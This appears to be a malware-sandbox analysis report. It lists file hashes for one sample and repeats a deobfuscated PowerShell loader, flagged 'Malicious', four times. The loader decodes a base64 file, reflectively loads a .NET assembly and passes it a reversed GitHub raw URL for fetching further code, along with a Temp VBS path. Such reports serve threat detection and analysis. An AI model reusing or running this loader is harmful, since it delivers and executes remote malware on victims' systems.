|
Hash | Hash Value |
|---|---|
| MD5 | 986254c4e7965203bf831482c95c5a43
|
| Sha1 | 44dde94caf0f2755ce4864302efdf529bcb95f4b
|
| Sha256 | 9e64eab0015911243a17b43f5a4bdbbf41516b1063fc70722acb3d8492434dd2
|
| Sha384 | 5f02607f19487acac003b5ebdef9f5bfe6654d25ecacd3797d30cd0fb036f1b49c630a394d1eaae96fbe7a7f9685387d
|
| Sha512 | 0df87359758dcc3dc40e6112fb8532b19aa863c6dbb2eeb090f5048e994e0a912e854c7a412560a00eba1c1732b19569cd32eeeaf684e617226605e4aeb7a2b4
|
| SSDeep | 24:Q0D1O/4+yu5b7nxByg5BI8lPMPMuZJYMwA64Ivt55XhXQ:PA4UnxZ5dM0sg55hA
|
| TLSH | C711C410AAEC810971736F09C3BEA1641477FA2DAD72CB0D0414D04D06B3A48DDB7F72
|
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca"))) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } ))) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca"))) Malicious |
986254c4e7965203bf831482c95c5a43 |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } ))) Malicious |
986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |